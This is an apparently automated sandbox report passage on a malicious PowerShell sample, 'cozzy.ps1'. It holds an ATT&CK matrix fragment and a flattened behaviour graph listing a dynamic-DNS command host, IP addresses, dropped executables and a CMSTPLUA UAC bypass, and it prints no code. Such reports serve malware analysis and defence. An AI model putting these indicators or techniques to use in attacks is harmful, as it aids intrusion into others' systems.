                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                      Process Injection
                      Network Sniffing1
                      System Owner/User Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638294 Sample: cozzy.ps1 Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 29 remyma.duckdns.org 2->29 31 geoplugin.net 2->31 33 198.187.3.20.in-addr.arpa 2->33 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 53 7 other signatures 2->53 8 powershell.exe 16 2->8         started        12 notepad.exe 2->12         started        signatures3 51 Uses dynamic DNS services 29->51 process4 file5 25 C:\Users\user\AppData\Local\Temp\x.exe, PE32+ 8->25 dropped 63 Found suspicious powershell code related to unpacking or dynamic code loading 8->63 65 Powershell drops PE file 8->65 14 x.exe 14 5 8->14         started        19 conhost.exe 8->19         started        signatures6 process7 dnsIp8 39 176.65.144.3, 49717, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 14->39 27 C:\Users\user\AppData\Local\...\RegAAsm.exe, PE32 14->27 dropped 41 Antivirus detection for dropped file 14->41 43 Multi AV Scanner detection for dropped file 14->43 21 RegAAsm.exe 4 13 14->21         started        file9 signatures10 process11 dnsIp12 35 remyma.duckdns.org 172.94.9.132, 49718, 52507 VOXILITYGB United States 21->35 37 geoplugin.net 178.237.33.50, 49719, 80 ATOM86-ASATOM86NL Netherlands 21->37 55 Antivirus detection for dropped file 21->55 57 Multi AV Scanner detection for dropped file 21->57 59 Contains functionality to bypass UAC (CMSTPLUA) 21->59 61 5 other signatures 21->61 signatures13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.